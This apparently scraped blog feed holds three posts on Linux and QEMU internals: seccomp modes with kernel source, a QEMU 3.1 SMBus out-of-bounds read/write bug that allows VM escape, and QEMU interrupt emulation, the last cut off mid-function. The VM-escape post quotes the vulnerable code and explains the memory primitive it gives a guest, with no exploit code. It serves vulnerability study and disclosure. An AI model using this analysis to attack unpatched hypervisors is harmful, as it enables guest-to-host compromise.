<p>The idea behind seccomp is very simple, as the following picture shows. First, the process sets the seccomp policy to strict or filter mode. This causes the kernel to set the seccomp flag in task_struct, and in filter mode the kernel also adds the filter program to a filter list in task_struct. Afterwards, for every system call the process makes, the kernel checks it against the seccomp mode and filters.</p>
<p><img src="/assets/img/seccomp/1.png" alt="" /></p>
<h3> Usage </h3>
<p>The following code shows the strict seccomp mode. By default a process has seccomp disabled, meaning it can call any system call. After switching to strict mode it can only call the four allowed system calls, so even prctl itself can no longer be called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <stdio.h>
#include <sys/prctl.h>
#include <linux/seccomp.h>
#include <unistd.h>
int main() {
int ret;
ret = prctl(PR_GET_SECCOMP);
if (ret == 0) {
printf("no seccomp enabled!\n");
}
else {
printf("seccomp enabled!\n");
}
prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT);
ret = prctl(PR_GET_SECCOMP);
printf("you should not see me!\n");
}
</code></pre></div></div>
<p>Following is the result.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:~$ ./prctl
no seccomp enabled!
Killed
</code></pre></div></div>
<p>The following code shows the filter mode. The BPF instruction spec can be found <a href="https://man.openbsd.org/bpf">here</a>. The BPF program here only allows the prctl and write system calls. Also note that we need to call prctl(PR_SET_NO_NEW_PRIVS) to ensure the current process and its children can’t be granted new privileges (for example, by running a setuid binary).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <stdio.h>
 #include <stdlib.h>      /* for exit */
 #include <sys/prctl.h>
 #include <linux/seccomp.h>
 #include <unistd.h>
 #include <linux/filter.h>
 #include <stddef.h>
 #include <sys/syscall.h>
int main() {
int ret;
struct sock_filter filter[] = {
BPF_STMT(BPF_LD+BPF_W+BPF_ABS, (offsetof(struct seccomp_data, nr))),
BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, __NR_prctl, 0, 1),
BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW),
BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, __NR_write, 0, 1),
BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW),
BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),
};
struct sock_fprog prog = {
.len = (unsigned short)(sizeof(filter)/sizeof(filter[0])),
.filter = filter,
};
ret = prctl(PR_GET_SECCOMP);
if (ret == 0) {
printf("no seccomp enabled!\n");
}
else {
printf("seccomp enabled!\n");
}
if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)) {
perror("prctl(NO_NEW_PRIVS)");
exit(1);
}
if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog)) {
perror("prctl(SECCOMP)");
exit(1);
}
ret = prctl(PR_GET_SECCOMP);
if (ret == 0) {
printf("no seccomp enabled!\n");
}
else {
printf("seccomp enabled = %d!\n", ret);
}
dup2(1,2);
printf("you should not see me!\n");
return 0;
}
</code></pre></div></div>
<p>Following is the result.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:~$ ./filter
no seccomp enabled!
seccomp enabled = 2!
Bad system call (core dumped)
</code></pre></div></div>
<h3> Kernel implementation </h3>
<p>We can use prctl to get/set the seccomp policy; the newer seccomp system call can also be used. The prctl system call is implemented in kernel/sys.c. The function ‘prctl_set_seccomp’ is called when the first argument of prctl is PR_SET_SECCOMP, as the following code shows.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> long prctl_set_seccomp(unsigned long seccomp_mode, char __user *filter)
{
unsigned int op;
char __user *uargs;
switch (seccomp_mode) {
case SECCOMP_MODE_STRICT:
op = SECCOMP_SET_MODE_STRICT;
/*
* Setting strict mode through prctl always ignored filter,
* so make sure it is always NULL here to pass the internal
* check in do_seccomp().
*/
uargs = NULL;
break;
case SECCOMP_MODE_FILTER:
op = SECCOMP_SET_MODE_FILTER;
uargs = filter;
break;
default:
return -EINVAL;
}
/* prctl interface doesn't have flags, so they are always zero. */
return do_seccomp(op, 0, uargs);
}
</code></pre></div></div>
<p>It sets ‘op’ according to the seccomp mode and calls do_seccomp.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static long do_seccomp(unsigned int op, unsigned int flags,
const char __user *uargs)
{
switch (op) {
case SECCOMP_SET_MODE_STRICT:
if (flags != 0 || uargs != NULL)
return -EINVAL;
return seccomp_set_mode_strict();
case SECCOMP_SET_MODE_FILTER:
return seccomp_set_mode_filter(flags, uargs);
default:
return -EINVAL;
}
}
</code></pre></div></div>
<p>For strict mode, it calls ‘seccomp_set_mode_strict’ directly.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static long seccomp_set_mode_strict(void)
{
const unsigned long seccomp_mode = SECCOMP_MODE_STRICT;
long ret = -EINVAL;
spin_lock_irq(&current->sighand->siglock);
if (!seccomp_may_assign_mode(seccomp_mode))
goto out;
#ifdef TIF_NOTSC
disable_TSC();
#endif
seccomp_assign_mode(current, seccomp_mode, 0);
ret = 0;
out:
spin_unlock_irq(&current->sighand->siglock);
return ret;
}
</code></pre></div></div>
<p>“seccomp_may_assign_mode” ensures that seccomp has not already been set; if it has been set and the previous mode differs from the requested one, it returns false. So once seccomp is set, it can’t be changed. The seccomp state of a process is stored in the ‘seccomp’ field of task_struct, defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct seccomp {
int mode;
struct seccomp_filter *filter;
};
struct seccomp_filter {
atomic_t usage;
struct seccomp_filter *prev;
struct bpf_prog *prog;
};
</code></pre></div></div>
<p>The ‘mode’ field indicates the seccomp mode, and the ‘filter’ field links all of the filters in seccomp filter mode.
Once the ‘seccomp_may_assign_mode’ check passes, ‘seccomp_set_mode_strict’ calls ‘seccomp_assign_mode’ to set the seccomp mode. It simply sets ‘task->seccomp.mode’ and sets the ‘TIF_SECCOMP’ flag in ‘task_struct->thread_info->flags’.
If the ‘op’ argument of ‘do_seccomp’ is ‘SECCOMP_SET_MODE_FILTER’, userland wants to set the seccomp mode to filter, and ‘do_seccomp’ calls ‘seccomp_set_mode_filter’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static long seccomp_set_mode_filter(unsigned int flags,
const char __user *filter)
{
const unsigned long seccomp_mode = SECCOMP_MODE_FILTER;
struct seccomp_filter *prepared = NULL;
long ret = -EINVAL;
/* Validate flags. */
if (flags & ~SECCOMP_FILTER_FLAG_MASK)
return -EINVAL;
/* Prepare the new filter before holding any locks. */
prepared = seccomp_prepare_user_filter(filter);
if (IS_ERR(prepared))
return PTR_ERR(prepared);
/*
* Make sure we cannot change seccomp or nnp state via TSYNC
* while another thread is in the middle of calling exec.
*/
if (flags & SECCOMP_FILTER_FLAG_TSYNC &&
mutex_lock_killable(&current->signal->cred_guard_mutex))
goto out_free;
spin_lock_irq(&current->sighand->siglock);
if (!seccomp_may_assign_mode(seccomp_mode))
goto out;
ret = seccomp_attach_filter(flags, prepared);
if (ret)
goto out;
/* Do not free the successfully attached filter. */
prepared = NULL;
seccomp_assign_mode(current, seccomp_mode, flags);
out:
spin_unlock_irq(&current->sighand->siglock);
if (flags & SECCOMP_FILTER_FLAG_TSYNC)
mutex_unlock(&current->signal->cred_guard_mutex);
out_free:
seccomp_filter_free(prepared);
return ret;
}
</code></pre></div></div>
<p>‘seccomp_prepare_user_filter’ prepares the new filter; it mainly calls ‘seccomp_prepare_filter’, which validates the argument provided by userland. It then performs a permission check: as the comment says, it only allows a process with ‘CAP_SYS_ADMIN in its namespace or be running with no_new_privs’ to set seccomp to filter mode.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct seccomp_filter *seccomp_prepare_filter(struct sock_fprog *fprog)
{
struct seccomp_filter *sfilter;
int ret;
const bool save_orig = config_enabled(CONFIG_CHECKPOINT_RESTORE);
if (fprog->len == 0 || fprog->len > BPF_MAXINSNS)
return ERR_PTR(-EINVAL);
BUG_ON(INT_MAX / fprog->len < sizeof(struct sock_filter));
/*
* Installing a seccomp filter requires that the task has
* CAP_SYS_ADMIN in its namespace or be running with no_new_privs.
* This avoids scenarios where unprivileged tasks can affect the
* behavior of privileged children.
*/
if (!task_no_new_privs(current) &&
security_capable_noaudit(current_cred(), current_user_ns(),
CAP_SYS_ADMIN) != 0)
return ERR_PTR(-EACCES);
/* Allocate a new seccomp_filter */
sfilter = kzalloc(sizeof(*sfilter), GFP_KERNEL | __GFP_NOWARN);
if (!sfilter)
return ERR_PTR(-ENOMEM);
ret = bpf_prog_create_from_user(&sfilter->prog, fprog,
seccomp_check_filter, save_orig);
if (ret < 0) {
kfree(sfilter);
return ERR_PTR(ret);
}
atomic_set(&sfilter->usage, 1);
return sfilter;
}
</code></pre></div></div>
<p>Then ‘seccomp_prepare_filter’ calls ‘bpf_prog_create_from_user’ to copy the filter program from userland into the kernel and perform a sanity check.
After preparing the filter, ‘seccomp_set_mode_filter’ calls ‘seccomp_attach_filter’ to attach the filter to the process, which simply links the new filter into the ‘task_struct->seccomp.filter’ list. Finally it sets ‘task_struct->seccomp.mode’ to SECCOMP_MODE_FILTER and sets the ‘TIF_SECCOMP’ flag in ‘task_struct->thread_info->flags’.</p>
<p>Once a process has a seccomp mode set, the system calls it can make are restricted or filtered. On system call entry the kernel checks ‘_TIF_WORK_SYSCALL_ENTRY’ (arch/x86/entry/entry_64.S); if it is non-zero, some work must be done before dispatching the system call.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define _TIF_WORK_SYSCALL_ENTRY \
(_TIF_SYSCALL_TRACE | _TIF_SYSCALL_EMU | _TIF_SYSCALL_AUDIT | \
_TIF_SECCOMP | _TIF_SINGLESTEP | _TIF_SYSCALL_TRACEPOINT | \
_TIF_NOHZ)
</code></pre></div></div>
<p>Here we can see that ‘_TIF_SECCOMP’ is part of ‘_TIF_WORK_SYSCALL_ENTRY’. The entry code first calls ‘syscall_trace_enter_phase1’, which in turn calls ‘seccomp_phase1’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> u32 seccomp_phase1(struct seccomp_data *sd)
{
int mode = current->seccomp.mode;
int this_syscall = sd ? sd->nr :
syscall_get_nr(current, task_pt_regs(current));
if (config_enabled(CONFIG_CHECKPOINT_RESTORE) &&
unlikely(current->ptrace & PT_SUSPEND_SECCOMP))
return SECCOMP_PHASE1_OK;
switch (mode) {
case SECCOMP_MODE_STRICT:
__secure_computing_strict(this_syscall); /* may call do_exit */
return SECCOMP_PHASE1_OK;
#ifdef CONFIG_SECCOMP_FILTER
case SECCOMP_MODE_FILTER:
return __seccomp_phase1_filter(this_syscall, sd);
#endif
default:
BUG();
}
}
</code></pre></div></div>
<p>For strict mode it calls ‘__secure_computing_strict’, which compares ‘this_syscall’ against the four allowed system calls and calls do_exit with SIGKILL if the current syscall is not one of them.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void __secure_computing_strict(int this_syscall)
{
int *syscall_whitelist = mode1_syscalls;
#ifdef CONFIG_COMPAT
if (is_compat_task())
syscall_whitelist = mode1_syscalls_32;
#endif
do {
if (*syscall_whitelist == this_syscall)
return;
} while (*++syscall_whitelist);
#ifdef SECCOMP_DEBUG
dump_stack();
#endif
audit_seccomp(this_syscall, SIGKILL, SECCOMP_RET_KILL);
do_exit(SIGKILL);
}
static int mode1_syscalls_32[] = {
__NR_seccomp_read_32, __NR_seccomp_write_32, __NR_seccomp_exit_32, __NR_seccomp_sigreturn_32,
0, /* null terminated */
};
</code></pre></div></div>
<p>For filter mode, it calls ‘__seccomp_phase1_filter’ to run the filters attached to ‘task_struct->seccomp.filter’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static u32 __seccomp_phase1_filter(int this_syscall, struct seccomp_data *sd)
{
u32 filter_ret, action;
int data;
/*
* Make sure that any changes to mode from another thread have
* been seen after TIF_SECCOMP was seen.
*/
rmb();
filter_ret = seccomp_run_filters(sd);
data = filter_ret & SECCOMP_RET_DATA;
action = filter_ret & SECCOMP_RET_ACTION;
switch (action) {
case SECCOMP_RET_ERRNO:
/* Set low-order bits as an errno, capped at MAX_ERRNO. */
if (data > MAX_ERRNO)
data = MAX_ERRNO;
syscall_set_return_value(current, task_pt_regs(current),
-data, 0);
goto skip;
case SECCOMP_RET_TRAP:
/* Show the handler the original registers. */
syscall_rollback(current, task_pt_regs(current));
/* Let the filter pass back 16 bits of data. */
seccomp_send_sigsys(this_syscall, data);
goto skip;
case SECCOMP_RET_TRACE:
return filter_ret; /* Save the rest for phase 2. */
case SECCOMP_RET_ALLOW:
return SECCOMP_PHASE1_OK;
case SECCOMP_RET_KILL:
default:
audit_seccomp(this_syscall, SIGSYS, action);
do_exit(SIGSYS);
}
unreachable();
skip:
audit_seccomp(this_syscall, 0, action);
return SECCOMP_PHASE1_SKIP;
}
</code></pre></div></div>
<p>Notice that only ‘SECCOMP_RET_TRACE’ causes ‘syscall_trace_enter_phase2’ to be called in entry_64.S. A return value of ‘SECCOMP_RET_KILL’ makes the process exit with the SIGSYS signal.</p>
make QEMU VM escape great again2018-12-06T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/12/06/qemu-escape
<p>QEMU 3.1 introduced a very serious security issue in its SMBus implementation.</p>
<p>The corresponding commit is following:</p>
<p><a href="https://git.qemu.org/?p=qemu.git;a=commitdiff;h=38ad4fae43b9c57a4ef3111217b110b25dbd3c50;hp=00bdfeab1584e68bad76034e4ffc33595533fe7d">i2c: pm_smbus: Add block transfer capability</a></p>
<p>And the fix is in <a href="https://git.qemu.org/?p=qemu.git;a=commit;h=f2609ffdf39bcd4f89b5f67b33347490023a7a84">i2c: pm_smbus: check smb_index before block transfer write</a></p>
<p>The issue is the processing of SMBHSTSTS command in smb_ioport_writeb() function.</p>
<p>Here we can see that s->smb_index is incremented without a bounds check.
The ‘read’ flag comes from ‘s->smb_addr’ and can be controlled via the SMBHSTADD command, so it is easy
to steer execution past the if (!read…) branch. Since ‘s->smb_index’ is a ‘uint32_t’, we can theoretically
increment it up to 0xffffffff. This ‘s->smb_index’ is used to index the memory in ‘s->smb_data’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>case SMBHSTSTS:
s->smb_stat &= ~(val & ~STS_HOST_BUSY);
if (!s->op_done && !(s->smb_auxctl & AUX_BLK)) {
uint8_t read = s->smb_addr & 0x01;
s->smb_index++;
if (!read && s->smb_index == s->smb_data0) {
uint8_t prot = (s->smb_ctl >> 2) & 0x07;
uint8_t cmd = s->smb_cmd;
uint8_t addr = s->smb_addr >> 1;
int ret;
if (prot == PROT_I2C_BLOCK_READ) {
s->smb_stat |= STS_DEV_ERR;
goto out;
}
ret = smbus_write_block(s->smbus, addr, cmd, s->smb_data,
s->smb_data0, !s->i2c_enable);
if (ret < 0) {
s->smb_stat |= STS_DEV_ERR;
goto out;
}
s->op_done = true;
s->smb_stat |= STS_INTR;
s->smb_stat &= ~STS_HOST_BUSY;
} else if (!read) {
s->smb_data[s->smb_index] = s->smb_blkdata;
s->smb_stat |= STS_BYTE_DONE;
} else if (s->smb_ctl & CTL_LAST_BYTE) {
s->op_done = true;
s->smb_blkdata = s->smb_data[s->smb_index];
s->smb_index = 0;
s->smb_stat |= STS_INTR;
s->smb_stat &= ~STS_HOST_BUSY;
} else {
s->smb_blkdata = s->smb_data[s->smb_index];
s->smb_stat |= STS_BYTE_DONE;
}
}
break;
</code></pre></div></div>
<p>Looking at this code snippet more closely, there are three ‘else’ branches after ‘s->smb_index’ is incremented.
The next important piece of data is ‘s->smb_blkdata’, which the guest can read and write
using the ‘SMBBLKDAT’ command. In the first ‘else’ we can assign ‘s->smb_blkdata’ to ‘s->smb_data[s->smb_index]’, which means we can write arbitrary bytes beyond the ‘s->smb_data’ array.
In the second and last ‘else’, ‘s->smb_data[s->smb_index]’ is assigned to ‘s->smb_blkdata’,
which means we can read bytes beyond the ‘s->smb_data’ array.</p>
<p>So we can read and write a lot of memory (4G theoretically) beyond the ‘s->smb_data’ array, which gives us
plenty of power and room to build an exploit.</p>
<p>Following is the demo of VM escape.</p>
<p><img src="/assets/img/qemues/1.jpg" alt="" /></p>
QEMU interrupt emulation2018-09-06T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/09/06/qemu-interrupt-emulation
<p>I have written a blog about KVM interrupt emulation. As we know, QEMU can emulate the whole system; in this blog I will discuss how QEMU emulates the interrupt chips of a virtual machine. We assume that the irqchip is fully emulated in QEMU, which can be achieved by adding ‘-machine kernel-irqchip=off’ to the QEMU command line.</p>
<h3> Interrupt controller initialization </h3>
<p>The function ‘pc_init1’ first allocates the ‘pcms->gsi’ to represent the interrupt delivery start point.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pcms->gsi = qemu_allocate_irqs(gsi_handler, gsi_state, GSI_NUM_PINS);
qemu_irq *qemu_allocate_irqs(qemu_irq_handler handler, void *opaque, int n)
{
return qemu_extend_irqs(NULL, 0, handler, opaque, n);
}
qemu_irq *qemu_extend_irqs(qemu_irq *old, int n_old, qemu_irq_handler handler,
void *opaque, int n)
{
qemu_irq *s;
int i;
if (!old) {
n_old = 0;
}
s = old ? g_renew(qemu_irq, old, n + n_old) : g_new(qemu_irq, n);
for (i = n_old; i < n + n_old; i++) {
s[i] = qemu_allocate_irq(handler, opaque, i);
}
return s;
}
</code></pre></div></div>
<p>This function allocates 24 ‘qemu_irq’ structs, with the handler set to ‘gsi_handler’. Here ‘gsi’ is short for ‘global system interrupts’.</p>
<p>Later, in ‘i440fx_init’, this ‘gsi’ is assigned to ‘piix3->pic’; it also calls ‘pci_bus_irqs’ to set the PCI bus’s ‘set_irq’ and ‘map_irq’ functions.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> pci_bus_irqs(b, piix3_set_irq, pci_slot_get_pirq, piix3,
PIIX_NUM_PIRQS);
</code></pre></div></div>
<p>The ‘piix3_set_irq’ function finally calls ‘piix3_set_irq_pic’, which as we can see raises the irq through ‘piix3->pic’, i.e. the ‘gsi’ array.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void piix3_set_irq_pic(PIIX3State *piix3, int pic_irq)
{
qemu_set_irq(piix3->pic[pic_irq],
!!(piix3->pic_levels &
(((1ULL << PIIX_NUM_PIRQS) - 1) <<
(pic_irq * PIIX_NUM_PIRQS))));
}
</code></pre></div></div>
<p>Returning to ‘pc_init1’, it calls ‘isa_bus_irqs’, which sets the ISA bus’s irqs to ‘gsi’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> isa_bus_irqs(isa_bus, pcms->gsi);
</code></pre></div></div>
<p>As we emulate the irqchip in QEMU, ‘i8259_init’ is called. It first calls ‘pc_allocate_cpu_irq’ to allocate a parent_irq, with ‘pic_irq_request’ as this irq’s handler.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if (kvm_pic_in_kernel()) {
i8259 = kvm_i8259_init(isa_bus);
} else if (xen_enabled()) {
i8259 = xen_interrupt_controller_init();
} else {
i8259 = i8259_init(isa_bus, pc_allocate_cpu_irq());
}
qemu_irq pc_allocate_cpu_irq(void)
{
return qemu_allocate_irq(pic_irq_request, NULL, 0);
}
</code></pre></div></div>
<p>In order to understand the function ‘i8259_init’, we first need to look at the i8259 realize function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void pic_realize(DeviceState *dev, Error **errp)
{
PICCommonState *s = PIC_COMMON(dev);
PICClass *pc = PIC_GET_CLASS(dev);
memory_region_init_io(&s->base_io, OBJECT(s), &pic_base_ioport_ops, s,
"pic", 2);
memory_region_init_io(&s->elcr_io, OBJECT(s), &pic_elcr_ioport_ops, s,
"elcr", 1);
qdev_init_gpio_out(dev, s->int_out, ARRAY_SIZE(s->int_out));
qdev_init_gpio_in(dev, pic_set_irq, 8);
pc->parent_realize(dev, errp);
}
</code></pre></div></div>
<p>In the ‘pic_realize’ function, the most important calls are ‘qdev_init_gpio_out’ and ‘qdev_init_gpio_in’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void qdev_init_gpio_out(DeviceState *dev, qemu_irq *pins, int n)
{
qdev_init_gpio_out_named(dev, pins, NULL, n);
}
void qdev_init_gpio_out_named(DeviceState *dev, qemu_irq *pins,
const char *name, int n)
{
int i;
NamedGPIOList *gpio_list = qdev_get_named_gpio_list(dev, name);
assert(gpio_list->num_in == 0 || !name);
if (!name) {
name = "unnamed-gpio-out";
}
memset(pins, 0, sizeof(*pins) * n);
for (i = 0; i < n; ++i) {
gchar *propname = g_strdup_printf("%s[%u]", name,
gpio_list->num_out + i);
object_property_add_link(OBJECT(dev), propname, TYPE_IRQ,
(Object **)&pins[i],
object_property_allow_set_link,
OBJ_PROP_LINK_UNREF_ON_RELEASE,
&error_abort);
g_free(propname);
}
gpio_list->num_out += n;
}
</code></pre></div></div>
<p>The ‘qdev_init_gpio_out’ function adds a link property named ‘unnamed-gpio-out[0]’ and points the link at ‘s->int_out’. Likewise, ‘qdev_init_gpio_in’ registers 8 input pins, ‘unnamed-gpio-in[0]’ through ‘unnamed-gpio-in[7]’, whose handler is ‘pic_set_irq’.</p>
<p>Now return to the function ‘i8259_init’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> qemu_irq *i8259_init(ISABus *bus, qemu_irq parent_irq)
{
qemu_irq *irq_set;
DeviceState *dev;
ISADevice *isadev;
int i;
irq_set = g_new0(qemu_irq, ISA_NUM_IRQS);
isadev = i8259_init_chip(TYPE_I8259, bus, true);
dev = DEVICE(isadev);
qdev_connect_gpio_out(dev, 0, parent_irq);
for (i = 0 ; i < 8; i++) {
irq_set[i] = qdev_get_gpio_in(dev, i);
}
isa_pic = dev;
isadev = i8259_init_chip(TYPE_I8259, bus, false);
dev = DEVICE(isadev);
qdev_connect_gpio_out(dev, 0, irq_set[2]);
for (i = 0 ; i < 8; i++) {
irq_set[i + 8] = qdev_get_gpio_in(dev, i);
}
slave_pic = PIC_COMMON(dev);
return irq_set;
}
</code></pre></div></div>
<p>It first creates the master PIC and connects its output pin (‘s->int_out’) to ‘parent_irq’; this is done through ‘qdev_connect_gpio_out’, which sets the ‘unnamed-gpio-out[0]’ link property. It then creates the slave PIC and connects its output pin to the master’s input pin 2 (‘irq_set[2]’). Finally it returns ‘irq_set’, which holds all of the PICs’ input ‘qemu_irq’s.</p>
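<p>The cascade wiring can be sketched as a toy model: two 8-input “PICs” where the slave’s output feeds the master’s input pin 2. This is a heavily simplified illustration (each PIC simply ORs its inputs) and ignores the real 8259 priority and masking logic; all names are invented.</p>

```c
#include <assert.h>

/* Toy model of the cascaded 8259 wiring built by i8259_init: ISA IRQs
 * 0-7 go to the master PIC, 8-15 to the slave, and the slave's output
 * pin feeds the master's input pin 2. */
typedef struct ToyPIC {
    int in[8];
    struct ToyPIC *out_master;  /* non-NULL for the slave */
    int out_pin;                /* master input pin driven by our output */
    int cpu_intr;               /* only meaningful for the master */
} ToyPIC;

static void toy_pic_update(ToyPIC *s)
{
    int level = 0;
    for (int i = 0; i < 8; i++)
        level |= s->in[i];      /* OR of all inputs stands in for the
                                 * real priority logic */
    if (s->out_master) {
        s->out_master->in[s->out_pin] = level;
        toy_pic_update(s->out_master);
    } else {
        s->cpu_intr = level;
    }
}

/* ISA IRQ n lands on pin n & 7 of the master (n < 8) or slave (n >= 8). */
static void toy_isa_set_irq(ToyPIC *master, ToyPIC *slave,
                            int isa_irq, int level)
{
    ToyPIC *pic = isa_irq < 8 ? master : slave;
    pic->in[isa_irq & 7] = level;
    toy_pic_update(pic);
}
```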
<p>These ‘qemu_irq’s are then assigned to ‘gsi_state’, and ‘ioapic_init_gsi’ is called to initialize the IOAPIC.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void ioapic_init_gsi(GSIState *gsi_state, const char *parent_name)
{
DeviceState *dev;
SysBusDevice *d;
unsigned int i;
if (kvm_ioapic_in_kernel()) {
dev = qdev_create(NULL, "kvm-ioapic");
} else {
dev = qdev_create(NULL, "ioapic");
}
if (parent_name) {
object_property_add_child(object_resolve_path(parent_name, NULL),
"ioapic", OBJECT(dev), NULL);
}
qdev_init_nofail(dev);
d = SYS_BUS_DEVICE(dev);
sysbus_mmio_map(d, 0, IO_APIC_DEFAULT_ADDRESS);
for (i = 0; i < IOAPIC_NUM_PINS; i++) {
gsi_state->ioapic_irq[i] = qdev_get_gpio_in(dev, i);
}
}
</code></pre></div></div>
<p>This creates the ioapic device and fills ‘gsi_state->ioapic_irq’ with the ioapic’s ‘qemu_irq’s. The latter are created in the ioapic device’s realize function; their handler is ‘ioapic_set_irq’.</p>
<h3> Interrupt delivery </h3>
<p>Let’s take a PCI device’s interrupt delivery as an example. A PCI device calls ‘pci_set_irq’ to raise an interrupt toward the guest.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void pci_set_irq(PCIDevice *pci_dev, int level)
{
int intx = pci_intx(pci_dev);
pci_irq_handler(pci_dev, intx, level);
}
static inline int pci_intx(PCIDevice *pci_dev)
{
return pci_get_byte(pci_dev->config + PCI_INTERRUPT_PIN) - 1;
}
static void pci_irq_handler(void *opaque, int irq_num, int level)
{
PCIDevice *pci_dev = opaque;
int change;
change = level - pci_irq_state(pci_dev, irq_num);
if (!change)
return;
pci_set_irq_state(pci_dev, irq_num, level);
pci_update_irq_status(pci_dev);
if (pci_irq_disabled(pci_dev))
return;
pci_change_irq_level(pci_dev, irq_num, change);
}
static void pci_change_irq_level(PCIDevice *pci_dev, int irq_num, int change)
{
PCIBus *bus;
for (;;) {
bus = pci_get_bus(pci_dev);
irq_num = bus->map_irq(pci_dev, irq_num);
if (bus->set_irq)
break;
pci_dev = bus->parent_dev;
}
bus->irq_count[irq_num] += change;
bus->set_irq(bus->irq_opaque, irq_num, bus->irq_count[irq_num] != 0);
}
</code></pre></div></div>
<p>There is a little PCI-specific knowledge here that I will not discuss; let’s just focus on the interrupt path.
In the last function, ‘pci_change_irq_level’, the PCI bus’s ‘map_irq’ is called to get the irq number, and then ‘set_irq’, which as we know is ‘piix3_set_irq’. That function in turn calls ‘piix3_set_irq_pic’.</p>
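<p>The ‘irq_count’ bookkeeping at the end of ‘pci_change_irq_level’ is worth a small example: since several devices may share one interrupt line, the bus counts how many of them are currently driving it high and asserts the line while the count is non-zero. A minimal stand-in, with hypothetical names:</p>

```c
#include <assert.h>

#define TOY_NUM_IRQS 4

/* Sketch of the level counting done by pci_change_irq_level: the bus
 * keeps irq_count[irq_num], the number of devices currently driving
 * that shared line high; the line is asserted while the count != 0. */
typedef struct ToyBus {
    int irq_count[TOY_NUM_IRQS];
    int line_level[TOY_NUM_IRQS];
} ToyBus;

static void toy_change_irq_level(ToyBus *bus, int irq_num, int change)
{
    bus->irq_count[irq_num] += change;
    bus->line_level[irq_num] = bus->irq_count[irq_num] != 0;
}
```

This is why a device lowering its interrupt does not necessarily deassert the shared line.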
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void piix3_set_irq_pic(PIIX3State *piix3, int pic_irq)
{
qemu_set_irq(piix3->pic[pic_irq],
!!(piix3->pic_levels &
(((1ULL << PIIX_NUM_PIRQS) - 1) <<
(pic_irq * PIIX_NUM_PIRQS))));
}
</code></pre></div></div>
<p>‘piix3->pic’ is the gsi array, whose handler is ‘gsi_handler’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void gsi_handler(void *opaque, int n, int level)
{
GSIState *s = opaque;
DPRINTF("pc: %s GSI %d\n", level ? "raising" : "lowering", n);
if (n < ISA_NUM_IRQS) {
qemu_set_irq(s->i8259_irq[n], level);
}
qemu_set_irq(s->ioapic_irq[n], level);
}
</code></pre></div></div>
<p>‘gsi_handler’ chooses the interrupt controller according to the irq number and calls the corresponding handler. Take ‘ioapic_irq’ as an example: the handler is ‘ioapic_set_irq’, which calls ‘ioapic_service’ to deliver the interrupt to the LAPIC. This is done through ‘stl_le_phys’, which triggers the APIC’s MMIO write function, ‘apic_mem_writel’. The APIC then calls ‘apic_update_irq’ to process the interrupt, then ‘cpu_interrupt’, and finally ‘kvm_handle_interrupt’.</p>
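<p>The dispatch rule of ‘gsi_handler’ can be modeled in a few lines, assuming ISA_NUM_IRQS is 16 and 24 GSIs as in the code above; the bookkeeping structure below is invented for illustration.</p>

```c
#include <assert.h>

#define TOY_ISA_NUM_IRQS 16
#define TOY_NUM_GSIS 24

/* Mirror of gsi_handler's dispatch rule: GSIs below 16 are delivered
 * to both the 8259 pair and the IOAPIC; higher GSIs go only to the
 * IOAPIC. Level arrays stand in for the real qemu_set_irq calls. */
typedef struct ToyGSIState {
    int i8259_level[TOY_ISA_NUM_IRQS];
    int ioapic_level[TOY_NUM_GSIS];
} ToyGSIState;

static void toy_gsi_dispatch(ToyGSIState *s, int n, int level)
{
    if (n < TOY_ISA_NUM_IRQS)
        s->i8259_level[n] = level;  /* qemu_set_irq(s->i8259_irq[n], ...) */
    s->ioapic_level[n] = level;     /* qemu_set_irq(s->ioapic_irq[n], ...) */
}
```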
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void kvm_handle_interrupt(CPUState *cpu, int mask)
{
cpu->interrupt_request |= mask;
if (!qemu_cpu_is_self(cpu)) {
